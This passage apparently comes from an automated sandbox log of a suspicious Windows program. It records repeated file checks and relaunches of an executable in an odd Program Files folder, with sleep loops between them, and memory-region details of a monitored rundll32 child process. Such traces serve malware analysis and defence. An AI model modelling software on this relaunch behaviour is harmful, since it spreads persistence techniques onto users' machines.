(x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x21b8, hThread=0x1cc4, dwProcessId=0x6c0, dwThreadId=0xd9c), hNewToken=0x0) returned 1 [0319.781] Sleep (dwMilliseconds=0x1388) [0319.782] Sleep (dwMilliseconds=0x1388) [0319.784] Sleep (dwMilliseconds=0x1388) [0319.785] Sleep (dwMilliseconds=0x1388) [0319.787] Sleep (dwMilliseconds=0x1388) [0319.788] Sleep (dwMilliseconds=0x1388) [0319.790] Sleep (dwMilliseconds=0x1388) [0319.791] Sleep (dwMilliseconds=0x1388) [0319.796] Sleep (dwMilliseconds=0x1388) [0319.797] Sleep (dwMilliseconds=0x1388) [0319.799] Sleep (dwMilliseconds=0x1388) [0319.800] Sleep (dwMilliseconds=0x1388) [0319.802] Sleep (dwMilliseconds=0x1388) [0319.804] Sleep (dwMilliseconds=0x1388) [0319.806] Sleep (dwMilliseconds=0x1388) [0319.807] Sleep (dwMilliseconds=0x1388) [0319.814] Sleep (dwMilliseconds=0x1388) [0319.815] Sleep (dwMilliseconds=0x1388) [0319.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.817] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1e7c, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.817] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.817] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da040) returned 1 [0319.817] NtQueryInformationFile (in: FileHandle=0x1e7c, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.817] NtClose (Handle=0x1e7c) returned 0x0 [0319.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.818] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1e7c, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.818] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da740) returned 1 [0319.818] NtClose (Handle=0x1e7c) returned 0x0 [0319.820] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1dfc, hThread=0x1e7c, dwProcessId=0x748, dwThreadId=0xf34), hNewToken=0x0) returned 1 [0319.894] Sleep (dwMilliseconds=0x1388) [0319.896] Sleep (dwMilliseconds=0x1388) [0319.897] Sleep (dwMilliseconds=0x1388) [0319.899] Sleep (dwMilliseconds=0x1388) [0319.900] Sleep (dwMilliseconds=0x1388) [0319.902] Sleep (dwMilliseconds=0x1388) [0319.907] Sleep (dwMilliseconds=0x1388) [0319.908] Sleep (dwMilliseconds=0x1388) [0319.909] Sleep (dwMilliseconds=0x1388) [0319.911] Sleep (dwMilliseconds=0x1388) [0319.912] Sleep (dwMilliseconds=0x1388) [0319.914] Sleep (dwMilliseconds=0x1388) [0319.915] Sleep (dwMilliseconds=0x1388) [0319.917] Sleep (dwMilliseconds=0x1388) [0319.918] Sleep (dwMilliseconds=0x1388) [0319.925] Sleep (dwMilliseconds=0x1388) [0319.927] Sleep (dwMilliseconds=0x1388) [0319.928] Sleep (dwMilliseconds=0x1388) [0319.929] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.930] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1c08, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.930] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.930] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da350) returned 1 [0319.930] NtQueryInformationFile (in: FileHandle=0x1c08, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.930] NtClose (Handle=0x1c08) returned 0x0 [0319.930] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.931] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1c08, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.931] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.931] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da270) returned 1 [0319.931] NtClose (Handle=0x1c08) returned 0x0 [0319.934] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1c74, hThread=0x1c08, dwProcessId=0xf48, dwThreadId=0xed4), hNewToken=0x0) returned 1 [0319.960] Sleep (dwMilliseconds=0x1388) [0319.962] Sleep (dwMilliseconds=0x1388) [0319.963] Sleep (dwMilliseconds=0x1388) [0319.965] Sleep (dwMilliseconds=0x1388) [0319.966] Sleep (dwMilliseconds=0x1388) [0319.968] Sleep (dwMilliseconds=0x1388) [0319.970] Sleep (dwMilliseconds=0x1388) [0319.974] Sleep (dwMilliseconds=0x1388) [0319.975] Sleep (dwMilliseconds=0x1388) [0319.978] Sleep (dwMilliseconds=0x1388) [0319.979] Sleep (dwMilliseconds=0x1388) [0319.981] Sleep (dwMilliseconds=0x1388) [0319.982] Sleep (dwMilliseconds=0x1388) [0319.984] Sleep (dwMilliseconds=0x1388) [0319.985] Sleep (dwMilliseconds=0x1388) [0319.990] Sleep (dwMilliseconds=0x1388) [0319.992] Sleep (dwMilliseconds=0x1388) [0319.994] Sleep (dwMilliseconds=0x1388) [0319.996] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.996] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1e54, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.996] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.996] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da270) returned 1 [0319.996] NtQueryInformationFile (in: FileHandle=0x1e54, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0319.996] NtClose (Handle=0x1e54) returned 0x0 [0319.996] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0319.996] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1e54, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0319.996] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0319.996] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9470) returned 1 [0319.996] NtClose (Handle=0x1e54) returned 0x0 [0319.999] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1c9c, hThread=0x1e54, dwProcessId=0xdfc, dwThreadId=0x7ac), hNewToken=0x0) returned 1 [0320.017] Sleep (dwMilliseconds=0x1388) [0320.018] Sleep (dwMilliseconds=0x1388) [0320.022] Sleep (dwMilliseconds=0x1388) [0320.023] Sleep (dwMilliseconds=0x1388) [0320.025] Sleep (dwMilliseconds=0x1388) [0320.026] Sleep (dwMilliseconds=0x1388) [0320.028] Sleep (dwMilliseconds=0x1388) [0320.030] Sleep (dwMilliseconds=0x1388) [0320.031] Sleep (dwMilliseconds=0x1388) [0320.032] Sleep (dwMilliseconds=0x1388) [0320.034] Sleep (dwMilliseconds=0x1388) [0320.041] Sleep (dwMilliseconds=0x1388) [0320.042] Sleep (dwMilliseconds=0x1388) [0320.044] Sleep (dwMilliseconds=0x1388) [0320.045] Sleep (dwMilliseconds=0x1388) [0320.047] Sleep (dwMilliseconds=0x1388) [0320.048] Sleep (dwMilliseconds=0x1388) [0320.055] Sleep (dwMilliseconds=0x1388) [0320.056] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0320.056] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1c30, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0320.056] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0320.056] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9470) returned 1 [0320.056] NtQueryInformationFile (in: FileHandle=0x1c30, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0320.056] NtClose (Handle=0x1c30) returned 0x0 [0320.057] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0320.057] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1c30, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0320.058] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0320.058] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1da270) returned 1 [0320.058] NtClose (Handle=0x1c30) returned 0x0 [0320.061] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0 | out: lpProcessInformation=0x1285fe80*(hProcess=0x1da8, hThread=0x1c30, dwProcessId=0xaa0, dwThreadId=0x784), hNewToken=0x0) returned 1 [0320.097] Sleep (dwMilliseconds=0x1388) [0320.099] Sleep (dwMilliseconds=0x1388) [0320.100] Sleep (dwMilliseconds=0x1388) [0320.102] Sleep (dwMilliseconds=0x1388) [0320.104] Sleep (dwMilliseconds=0x1388) [0320.105] Sleep (dwMilliseconds=0x1388) [0320.145] Sleep (dwMilliseconds=0x1388) [0320.146] Sleep (dwMilliseconds=0x1388) [0320.148] Sleep (dwMilliseconds=0x1388) [0320.151] Sleep (dwMilliseconds=0x1388) [0320.152] Sleep (dwMilliseconds=0x1388) [0320.154] Sleep (dwMilliseconds=0x1388) [0320.158] Sleep (dwMilliseconds=0x1388) [0320.160] Sleep (dwMilliseconds=0x1388) [0320.161] Sleep (dwMilliseconds=0x1388) [0320.163] Sleep (dwMilliseconds=0x1388) [0320.164] Sleep (dwMilliseconds=0x1388) [0320.166] Sleep (dwMilliseconds=0x1388) [0320.183] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0320.183] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1d28, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0320.183] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0320.183] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1daa50) returned 1 [0320.183] NtQueryInformationFile (in: FileHandle=0x1d28, IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x1285fd50, FileInformation=0x1285fd60) returned 0x0 [0320.183] NtClose (Handle=0x1d28) returned 0x0 [0320.184] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0x1285fda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0320.184] NtCreateFile (in: FileHandle=0x1285fd40, DesiredAccess=0x120089, ObjectAttributes=0x1285fdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1285fd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1285fd40*=0x1d28, IoStatusBlock=0x1285fd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0320.184] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1285fcc0 | out: HeapArray=0x1285fcc0*=0x570000) returned 0x6 [0320.184] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xb1d9b70) returned 1 [0320.184] NtClose (Handle=0x1d28) returned 0x0 [0320.187] CreateProcessInternalW (hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1285fea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1285fe80, hNewToken=0x0) Thread: id = 91 os_tid = 0xfb8 Thread: id = 92 os_tid = 0xc4c Thread: id = 93 os_tid = 0xe28 Thread: id = 94 os_tid = 0xe2c Thread: id = 95 os_tid = 0xe24 Thread: id = 96 os_tid = 0x1128 Thread: id = 97 os_tid = 0xe40 Thread: id = 123 os_tid = 0x10d4 Thread: id = 124 os_tid = 0x10e8 Thread: id = 125 os_tid = 0x10ec Thread: id = 126 os_tid = 0x1100 Thread: id = 127 os_tid = 0x168 Thread: id = 128 os_tid = 0x1104 Thread: id = 129 os_tid = 0x1118 Thread: id = 130 os_tid = 0x111c Thread: id = 131 os_tid = 0x1120 Thread: id = 132 os_tid = 0x113c Process: id = "7" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x25717000" os_pid = "0xf98" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Windows\\SysWOW64\\rundll32.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1164 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1165 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1166 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1167 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1168 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1169 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1170 start_va = 0x840000 end_va = 0x851fff monitored = 0 entry_point = 0x844600 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 1171 start_va = 0x860000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 1172 start_va = 0x77990000 end_va = 0x77b0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1173 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1174 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1175 start_va = 0x7fff0000 end_va = 0x7dfb61c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1176 start_va = 0x7dfb61c50000 end_va = 0x7ffb61c4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb61c50000" filename = "" Region: id = 1177 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1178 start_va = 0x7ffb61e11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb61e11000" filename = "" Region: id = 1180 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1181 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1182 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1192 start_va = 0x110000 end_va = 0x138fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1194 start_va = 0x840000 end_va = 0x851fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1195 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1196 start_va = 0x6fec0000 end_va = 0x6ff39fff monitored = 0 entry_point = 0x6fed3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1197 